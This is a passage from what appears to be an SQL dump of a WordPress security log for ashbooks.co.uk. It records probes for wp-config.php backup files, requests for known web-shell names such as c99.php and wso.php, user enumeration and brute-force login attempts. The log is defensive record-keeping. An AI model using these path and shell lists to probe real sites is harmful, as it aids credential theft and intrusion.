p.backup'),('5.188.62.19',96222739,'',0,1636141480.9753,55,'38l1jPSnrqTyfOQIAm49eHpx','','19|0|0|0|ashbooks.co.uk/wp-config.php.bak'),('5.188.62.19',96222739,'',0,1636141481.5346,55,'Fs8lSeUT4qa5KEQZ0r1DXmoz','','19|0|0|0|ashbooks.co.uk/wp-config.php.dist'),('5.188.62.19',96222739,'',0,1636141482.0041,55,'lJ4z9MeOq3SECacorZ6PTRkn','','19|0|0|0|ashbooks.co.uk/wp-config.php.html'),('5.188.62.19',96222739,'',0,1636141482.0459,10,'lJ4z9MeOq3SECacorZ6PTRkn','','707|0|0|0|ashbooks.co.uk/wp-config.php.html'),('5.188.62.19',96222739,'',0,1636141482.5941,55,'7I1xlLb2mNEhGRBWvVFenp0S','','19|0|0|0|ashbooks.co.uk/wp-config.php.inc'),('5.188.62.19',96222739,'',0,1636141482.8644,55,'PhILjovzMWuTkmsOHq5RgcAJ','','19|0|0|0|ashbooks.co.uk/wp-config.php.old'),('5.188.62.19',96222739,'',0,1636141483.3905,55,'qDMHBLeZhpcVTjxCuad75NkP','','19|0|0|0|ashbooks.co.uk/wp-config.php.orig'),('5.188.62.19',96222739,'',0,1636141483.6786,55,'0nc8J195CkdhBwi3TpQAbFRo','','19|0|0|0|ashbooks.co.uk/wp-config.php.original'),('5.188.62.19',96222739,'',0,1636141483.9627,55,'JzD6dWUb9v8FoCOcginKY2ah','','19|0|0|0|ashbooks.co.uk/wp-config.php.save'),('5.188.62.19',96222739,'',0,1636141484.5048,55,'HsVehuD1oUTZwrCBARiWO52t','','19|0|0|0|ashbooks.co.uk/wp-config.php.swp'),('5.188.62.19',96222739,'',0,1636141487.1209,55,'8DU0BCQmWxLjOqNXcdPhTGgZ','','19|0|0|0|ashbooks.co.uk/wp-config.php.dump'),('5.188.62.19',96222739,'',0,1636141488.0698,55,'P2BR8iAnGmhQapgojUCZlr4J','','19|0|0|0|ashbooks.co.uk/wp-config.php.2'),('5.188.62.19',96222739,'',0,1636141489.5953,55,'Dy6kiSnJZcEjbOv2HgUXQd3W','','19|0|0|0|ashbooks.co.uk/wp-config.php.0'),('5.188.62.19',96222739,'',0,1636141491.9796,55,'7s2geG8m96FKpCnTXoVxSydB','','19|0|0|0|ashbooks.co.uk/wp-config.php.tmp'),('5.188.62.19',96222739,'',0,1636141492.9054,55,'lX3T75psJZnQrNtkLiVayAfh','','19|0|0|0|ashbooks.co.uk/wp-config.php.back'),('5.188.62.19',96222739,'',0,1636141493.8088,55,'RHaxC0emzd9VDqProlh8M6Ic','','19|0|0|0|ashbooks.co.uk/wp-config.php.bac'),('5.188.62.19',96222739,'',0,1636141494.7462,55,'x8KCD3mBgYqQtb74E2SIedLN','','19|0|0|0|ashbooks.co.uk/wp-config.php.bk'),('5.188.62.19',96222739,'',0,1636141495.6398,55,'NZ0wMTdbftkXvm3IyqhuHOjK','','19|0|0|0|ashbooks.co.uk/wp-config.php.bkp'),('5.188.62.19',96222739,'',0,1636141496.4911,55,'xV8s1BNTAIjcWpZwgJGzYLPm','','19|0|0|0|ashbooks.co.uk/wp-config.php.b'),('5.188.62.19',96222739,'',0,1636141497.3992,55,'f8JyoOXiBIdYSr21kcUgR0D5','','19|0|0|0|ashbooks.co.uk/wp-config.php.test'),('5.188.62.19',96222739,'',0,1636141498.0087,55,'zLkinE9X5K8Uqgbl7JZ4e2Yw','','19|0|0|0|ashbooks.co.uk/wp-config.php.dev'),('5.188.62.19',96222739,'',0,1636141498.9132,55,'Xxat0TPvJ9E1VZznNdFSmyWY','','19|0|0|0|ashbooks.co.uk/wp-config.php.temp'),('5.188.62.19',96222739,'',0,1636141500.7875,55,'RFHgXKDsOnCeaTlMwN80E6PG','','19|0|0|0|ashbooks.co.uk/wp-config.php.new'),('95.223.73.192',1608468928,'',0,1636147221.1930,55,'NaYU628EZIQyuAO1LDsRwnmr','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('40.121.16.96',679022688,'',0,1636155054.6564,70,'OVkRICwx79Sl2APWFvBLNpZz','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('40.121.16.96',679022688,'bitezsultan_d0tkrlje',0,1636155057.5989,51,'6niJItQEv8TpsfXLxcyuNMFl','','0|0|0|0|ashbooks.co.uk//wp-login.php'),('103.152.118.225',1738045153,'admin',0,1636156291.9932,7,'XxWRofGcI5guT4a1tzOBV7SA','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.63.173.50',3107958066,'admin',0,1636158753.7472,7,'YW0Khm7dk8p4S3Rf6nOLojvE','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('161.35.225.67',2703483203,'',0,1636159519.4335,70,'Flhn8rdvPOVCj7tL5RIsw2WY','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('161.35.225.67',2703483203,'admin',0,1636159520.5235,7,'0say614vhmBiNjxIDO3W9bRF','','0|0|0|0|ashbooks.co.uk//wp-login.php'),('185.49.20.79',3107001423,'admin',0,1636161083.8454,7,'YKyCsx1DQaA4ikWZlJ9cbGdo','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.30.240.30',1159655454,'ashbooks',0,1636162420.0598,51,'e2aOcwXrDQ0LsFbuWUG4Inxv','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('34.134.243.229',579269605,'admin',0,1636163570.3963,7,'6eWTF1oXELnPDvsJIQCaSUGZ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.2.4.44',3103917100,'admin',0,1636166551.4827,7,'z6FyQOh8cmIsK24UM0VJLtdq','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('212.224.76.233',3571469545,'',0,1636175234.5547,70,'ocw9OVEMfeuSgQ0GhDYvUB7l','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('82.165.222.205',1386602189,'',0,1636178953.6586,55,'bDCPjnfZk9gLHR2OEGuIFQoh','','19|0|0|0|ashbooks.co.uk/cgi-bin/mt/mt-atom.cgi'),('192.187.118.203',3233511115,'admin',0,1636179855.9897,7,'HpxfdNLKRM6oiSh0I2V1leFG','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('162.55.85.219',2721535451,'',0,1636187487.5133,55,'ca2wkMNbAEuY6ziqnIHtWCh0','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('85.31.101.215',1428121047,'admin',0,1636190425.3644,7,'vQ4X9bZrfewdMuLV0qHYDEkT','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'wordcamp',0,1636191291.9682,51,'RPbKCB5Ym0F3AMGtUf9ks7dX','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'adminlin',0,1636195619.7842,51,'T62sZvScEueIYAoyOWq4pfCb','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('89.207.146.189',1506775741,'admin',0,1636197561.1400,7,'k8bhYXZIi9HOuCVGgDzteFd7','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('104.45.152.159',1747818655,'',0,1636197994.9866,55,'Alvkf7qPBuoY6a3rgyeVzTnI','','19|0|0|0|ashbooks.co.uk/a.php'),('104.45.152.159',1747818655,'',0,1636197996.9323,55,'6Uh0BMvTw9J8zLuG1pd7WxAe','','19|0|0|0|ashbooks.co.uk/z.php'),('104.45.152.159',1747818655,'',0,1636197998.9133,55,'exFlC7bMgS6sRriqyjHZT3zk','','19|0|0|0|ashbooks.co.uk/e.php'),('104.45.152.159',1747818655,'',0,1636198000.6677,55,'r9KIFmspRc0b7o35DU8wXTAg','','19|0|0|0|ashbooks.co.uk/r.php'),('104.45.152.159',1747818655,'',0,1636198002.8672,55,'8pH4v7C5tsVAoBIeKj3GXFqd','','19|0|0|0|ashbooks.co.uk/mawar.php'),('104.45.152.159',1747818655,'',0,1636198002.9176,10,'8pH4v7C5tsVAoBIeKj3GXFqd','','707|0|0|0|ashbooks.co.uk/mawar.php'),('104.45.152.159',1747818655,'',0,1636198005.4538,55,'3ruol2CWFbSLsGqOfJgjh4Mm','','19|0|0|0|ashbooks.co.uk/pop.php'),('104.45.152.159',1747818655,'',0,1636198007.5373,55,'Me2OAaxn40WlTNIXcziPrtQE','','19|0|0|0|ashbooks.co.uk/ko.php'),('104.45.152.159',1747818655,'',0,1636198009.7252,55,'01wCicxNoehA8sJHylgPWKu3','','19|0|0|0|ashbooks.co.uk/gel.php'),('104.45.152.159',1747818655,'',0,1636206989.7614,70,'zh0XndYv38boIxf7j2GpHZFW','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('104.45.152.159',1747818655,'admin',0,1636206995.8587,7,'CdeG36MvBXTNPa2fuhq0ElkL','','0|0|0|0|ashbooks.co.uk//wp-login.php'),('3.16.255.251',51445755,'ashbooks',0,1636209490.9628,51,'zPv6MXlL07ynCJopAHDicWrN','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'ashbooks',0,1636209516.0742,51,'oNpjJyLBiIcMY5QFZ0E3nrTq','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'ashbooks',0,1636209549.3211,51,'PT0njVd74pr9vBZE1slqSHyM','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'ashbooks',0,1636209591.1182,51,'Uriwk6ImgP4Jt5Kj7oa8hsXR','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'ashbooks',0,1636209638.1257,51,'GACfzJXLuxFOd7ETq5kR03ly','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636209638.1751,10,'GACfzJXLuxFOd7ETq5kR03ly','','701|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636209691.0757,50,'3rHeD9UEJPY1wsfZCQWgijp7','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636209745.0535,50,'UO5zvsH3dDWY7IPtSLTKbAmN','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636209798.7220,50,'nsKx4WCTbXJtuwaNj1EFlRZo','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636209851.0606,50,'rWYHGOElodAB9jRQ0kTfbN3c','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636209905.9017,50,'1W7loIE5kMmPJF6OfdjZvYX3','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636209964.1705,50,'KGdqW7jJ64BUYTMC12nkHAwN','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636210020.8115,50,'wNbf9S4eaJpVAIWlyxRonPQh','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636210076.4301,50,'8UoyKOZj0ERuvQ7wcaTbFGmf','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636210131.6826,50,'SPDJjrK6zyWFe19nbNLMcdUv','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636210184.3748,50,'OiE0DIpn9JsovacgC6bQP4rY','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636210238.5826,50,'QXN94SV5THgWhL3j1qBts08E','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636210293.3213,50,'M58oe4Svp7h2VDdUACl9mOib','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636210349.1513,50,'hSapF1NeyBsxPUmjbc3E4HY5','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636210402.2936,50,'jaPvbRh0wqLct9sIZ4XAQd6m','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636210456.1627,50,'wA1esxDofpTinWbNkJGamVZU','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636210510.2182,50,'CScdHFKEgUVeowiMYNyOk8Ab','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636210567.5695,50,'XI4rDOLMbusvQCxYiT0qHN9K','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636210622.2357,50,'G9tAYrDxTvfoLX3FEgbP56kC','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636210678.3578,50,'fbu04WRkq1dFCKvhBE7H5IDg','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636210733.4223,50,'GyDE0VJe7ZOC3i4ukBqgoN1F','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636210787.5325,50,'FbSwsPJEQ8xduqo7IThy4U0X','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636210850.6187,50,'BVXYoehayFRDI6ctUvnCQWN2','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636210918.6081,50,'DqzJRr7Q9PGX3jlCknuLE1ph','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636210986.6600,50,'HqgU2rujMy0xObahDzcGFwsT','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636211052.8877,50,'ZWHa79hwkP2GXoLlDyzectmA','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636211118.6314,50,'jU1nHVz0C6LpGe4DuKwqSsER','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636211185.0399,50,'qDN9rSgylx2jE0ph8VoZs6Ld','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636211253.0912,50,'BAGXzhY6bOQPS7UTkjuVWops','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636211320.7754,50,'C5DVgAtf9z0OUdnB2rNlmPsj','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636211388.5136,50,'HbW2YtTRv84qsSeJ0oZzhagw','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636211454.2231,50,'f8gOPQiwSIhJbU2B5sjEMKcq','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636211519.5583,50,'9bC3ZAFspkDhPLBWSQftq6Il','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636211588.6811,50,'Np92sjFXn0eDCmEOTKYkItSH','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636211656.3066,50,'u4WmsPAx9F3cKgbrReQl02Xn','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636211725.6765,50,'SCP80NdUQmszVRiTW75nuDxK','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636211794.8586,50,'OkfQqvAibBXUj51umetohwGZ','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636211864.6590,50,'F6kxW9uXl5nsb2TjDHNoPvrZ','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636211936.8725,50,'hEx6nYLmOsjogbac9T70iARS','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636212008.2151,50,'3dycijF6IsVNWBnwl5Jukf28','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636212080.8263,50,'pSvdT7e9FKZIRJzmsBQyNhwl','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636212148.8690,50,'A2Lz8x5HNsW1YrJbf0h6gtOu','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636212216.3622,50,'EDV4uQdPgU1h6eOCKlIq70WG','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636212284.5547,50,'ucQANa7iRO5vhsT4qXbZG1LE','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636212353.2921,50,'bTtSjkn7vGR3xPE9JHZYcsAz','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636212422.0943,50,'dD5KW4gTr6uiMXRjvIGAkSps','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636212491.5858,50,'SC7rAELUokTzl6gvjMynQOBD','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636212558.3675,50,'IEl05H71mNO2Kc6kbhT3BwJG','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636212628.3413,50,'LIETXCuGSlbnVpkY8Ps0yhRQ','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636212701.4715,50,'XU489OazpjG07nPNybdZtRwe','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636212773.6047,50,'xrnhVNSbc1OFX5BpPE2jtzTu','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636212843.6195,50,'gfJEV9X51srNilLYKkCdFMAw','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636212911.6584,50,'aKmDQbezdc4rvYSTjRgCxMZw','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636212980.7990,50,'taCqFr8bpQyJ729eAMYVBOx0','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636213051.1214,50,'8IGnbM6VNjztu3ep1lsYcx4y','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636213121.7381,50,'CQ2nmYUasdpBfb3Ph8eAuIgk','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636213189.4209,50,'sZ1VDcy7mOCBq43LxnHepKAt','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'ashbooks',0,1636213257.8876,51,'38mbHp4ZQ1L29yUxjDvfu7CR','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636213257.9071,10,'38mbHp4ZQ1L29yUxjDvfu7CR','','707|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636213328.5057,50,'8PcLUoFA5dstNGajfyhklu9n','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636213401.8264,50,'F4BtHIPzfN9QDyZU0m7s5liG','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636213473.6684,50,'Ln5U6yaiQ7YWE9Dtbslkcrjw','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636213542.8094,50,'uT0kORXIrzlmnECbNQoVqLA3','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636213609.4441,50,'A2CsUIbBiENRocWyz1w7ePOM','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636213677.3302,50,'GKvFMxUY52se64d1bLtDoJ9r','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636213746.5748,50,'c5a38DSMBItuFZPwXWj7e9HR','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636213814.9743,50,'2IGjUs9adxXhivFebtnfS6Wq','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636213883.4334,50,'1mLY2WEFu4PayQ9T8efBvXxR','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636213949.0031,50,'GXkQVLFbDcKupr2iId9henZE','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636214015.7080,50,'tDCsxcZAGfeawEkiSPU0Kjqr','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636214084.2774,50,'UTtQRb75dW4p0vXIk8yaqfzA','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636214152.6857,50,'Z9oA3vE8UPcYVyhguRNjTWe5','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636214221.3310,50,'6perFUn3tuISX8kHQdN0Vj5z','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636214289.1291,50,'cXZCrQDew1q8PbMTt9Josl7R','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636214354.3010,50,'U6mIDvinM9ykdXPGZCA3K2f1','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636214422.4582,50,'rmUIJqbx9Ry7HgBeZc2F5CDN','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636214492.9890,50,'0p47tnDRswAJvuyOTUKYgXmq','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636214564.1149,50,'uYHb7WNgAxj6C3J0qZvFtPE4','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('107.150.57.37',1805007141,'ashbooks',0,1636214626.5651,51,'2INoLAslyKJmxQr1WSa7udv4','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636214636.1948,50,'hKPw9tzoOE5HRcWTBXdV2FfN','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636214702.8832,50,'H3rGx7a0IEmkzB4USXnRMlvC','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('3.16.255.251',51445755,'',0,1636214770.8172,50,'A9tacBqp2ZJzLrPdSDy3RMnF','','13|0|0|0|ashbooks.co.uk/wp-login.php'),('103.120.169.62',1735960894,'',0,1636231305.7204,70,'FKLq9IMSZHea3v87pfCgOzEY','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('45.64.54.158',759183006,'admin',0,1636235356.8204,7,'wKkVdbE6MgDS9NoeHrTvhJFi','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('82.208.189.233',1389411817,'',0,1636240105.0887,55,'q8QEn9GAr5mBDb6Uh0sFfkTY','','19|0|0|0|ashbooks.co.uk/xmrlpc.php'),('157.245.174.114',2650123890,'',0,1636244624.2930,55,'8GANFD3EfPOxgQRsejTVMlqc','','19|0|0|0|ashbooks.co.uk/x.php'),('157.245.174.114',2650123890,'',0,1636244624.7725,55,'5Qm3lunRVtFka1ANdXPECMGz','','19|0|0|0|ashbooks.co.uk/alfa.php'),('157.245.174.114',2650123890,'',0,1636244625.5265,55,'8hLnrBxiORHCpPMuoGbUaZv9','','19|0|0|0|ashbooks.co.uk/c99.php'),('157.245.174.114',2650123890,'',0,1636244625.9687,55,'ClX7Z8g3jN4xnwLdoaBFiWJ5','','19|0|0|0|ashbooks.co.uk/mini.php'),('157.245.174.114',2650123890,'',0,1636244626.7040,55,'9KmpBUEcPyRoJTx8FgnMk5Yi','','19|0|0|0|ashbooks.co.uk/a.php'),('157.245.174.114',2650123890,'',0,1636244626.7300,10,'9KmpBUEcPyRoJTx8FgnMk5Yi','','707|0|0|0|ashbooks.co.uk/a.php'),('157.245.174.114',2650123890,'',0,1636244627.6549,55,'IRlpCnXa2F7Zv6yAQmzxfE4b','','19|0|0|0|ashbooks.co.uk/wso.php'),('157.245.174.114',2650123890,'',0,1636244628.1117,55,'hHcxT16DInBZ0KqmeEAspLUR','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/dzs-zoomsounds/wp_mnax.php'),('157.245.174.114',2650123890,'',0,1636244629.3952,55,'fKHrX3p1Py28kZNa7uFsGOTo','','19|0|0|0|ashbooks.co.uk/leafmailer.php'),('157.245.174.114',2650123890,'',0,1636244629.8513,55,'SzOsTPjiKlwc9vYJHu08nD1V','','19|0|0|0|ashbooks.co.uk/le.php'),('157.245.174.114',2650123890,'',0,1636244630.5448,55,'IxFd0Q9SA8jyHeMqKYsp3J6D','','19|0|0|0|ashbooks.co.uk/1index.php'),('157.245.174.114',2650123890,'',0,1636244630.9613,55,'PJj1OCqVZlotN6LQ4yUBxwMf','','19|0|0|0|ashbooks.co.uk/fw.php'),('54.193.101.186',918644154,'',0,1636245292.5763,70,'4gDJKw2tCh5PVuQp9Ueo0rni','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('54.193.101.186',918644154,'',0,1636246838.7899,70,'Mv0aRYbGdOpJLyqmTHljguef','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('82.208.189.233',1389411817,'',0,1636248683.1700,55,'bpSKrumgO8R5UjlECisqMoQw','','19|0|0|0|ashbooks.co.uk/1index.php'),('35.192.102.215',599811799,'admin',0,1636252603.9991,7,'W8T1KyRZpo7CIFSiMlQmHhvO','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('82.223.69.194',1390364098,'admin',0,1636263093.4913,7,'Y4hbidJ25qONcrus8Rt7InHW','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.76',96222796,'',0,1636267783.1905,70,'jfdhFw08zykEbX1o4csQa39Y','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('161.35.225.67',2703483203,'',0,1636274067.4811,70,'m8MQdlIXHyD1e6JOr74Si0Zn','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('161.35.225.67',2703483203,'admin',0,1636274068.7654,7,'9L7GeK1ZWJOjEmb6HQ3CMaU2','','0|0|0|0|ashbooks.co.uk//wp-login.php'),('5.188.62.76',96222796,'ashbooks',0,1636297355.4273,51,'DLElo65FspMeQHI7fu1GzVky','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('192.187.118.203',3233511115,'admin',0,1636298278.6779,7,'Jo7LrKdafxTENQYX1HSh6A0W','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('157.245.174.114',2650123890,'',0,1636303584.1067,55,'ieVvZCA8JpNxUwBFuY5QhlXy','','19|0|0|0|ashbooks.co.uk/x.php'),('157.245.174.114',2650123890,'',0,1636303584.8695,55,'MX2uVv57yrmS8GZ0iWcdn61U','','19|0|0|0|ashbooks.co.uk/alfa.php'),('157.245.174.114',2650123890,'',0,1636303585.6834,55,'U9yKiQeNFghHTd7ak1o0Jsjn','','19|0|0|0|ashbooks.co.uk/c99.php'),('157.245.174.114',2650123890,'',0,1636303586.4982,55,'VLDgm8kqh17zTY3jHa0IQwXn','','19|0|0|0|ashbooks.co.uk/mini.php'),('157.245.174.114',2650123890,'',0,1636303587.0279,55,'XInvfxOVlSBYPpCkbUgA8ENm','','19|0|0|0|ashbooks.co.uk/a.php'),('157.245.174.114',2650123890,'',0,1636303587.1252,10,'XInvfxOVlSBYPpCkbUgA8ENm','','707|0|0|0|ashbooks.co.uk/a.php'),('157.245.174.114',2650123890,'',0,1636303587.8738,55,'xHOF7vdk1aA4fnjtgIUEJqPX','','19|0|0|0|ashbooks.co.uk/wso.php'),('157.245.174.114',2650123890,'',0,1636303588.6842,55,'DEICTcUNZK2mQthv3d9OLFP7','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/dzs-zoomsounds/wp_mnax.php'),('157.245.174.114',2650123890,'',0,1636303589.7517,55,'FCeHktB2u1dYETDPOhW708po','','19|0|0|0|ashbooks.co.uk/leafmailer.php'),('157.245.174.114',2650123890,'',0,1636303592.2715,55,'5cQ6wjyXV1vpiWJq7PuNdEHa','','19|0|0|0|ashbooks.co.uk/le.php'),('157.245.174.114',2650123890,'',0,1636303592.8413,55,'EXbqmItOlSW8vPCQA5hk0H4J','','19|0|0|0|ashbooks.co.uk/1index.php'),('157.245.174.114',2650123890,'',0,1636303593.6302,55,'KncDpFaJMztw5vGlOBmU2Ixj','','19|0|0|0|ashbooks.co.uk/fw.php'),('107.150.57.38',1805007142,'ashbooks',0,1636314096.4324,51,'BtIxV5vDYKWTZ3qML6bX9ln4','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('40.79.249.244',676329972,'',0,1636316583.3918,70,'2h5VYXvKJa7iqbyzGx8LZSps','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('40.79.249.244',676329972,'admin',0,1636316596.5531,7,'d2G9WxYVlhUsMHiTpJQOkI4w','','0|0|0|0|ashbooks.co.uk//wp-login.php'),('82.208.189.233',1389411817,'',0,1636318576.7965,55,'9NpwOnJf76oBDg1Pt4XGd8rm','','19|0|0|0|ashbooks.co.uk/xmrlpc.php'),('174.138.28.238',2928286958,'',0,1636320936.9391,70,'98CN1busMfxdweOSLKQVZU3t','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('174.138.28.238',2928286958,'',0,1636320961.0336,70,'vOxfJVbW51ngp9wsYmQDMz02','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('82.165.222.205',1386602189,'',0,1636328876.2284,55,'B9WlA50YnX8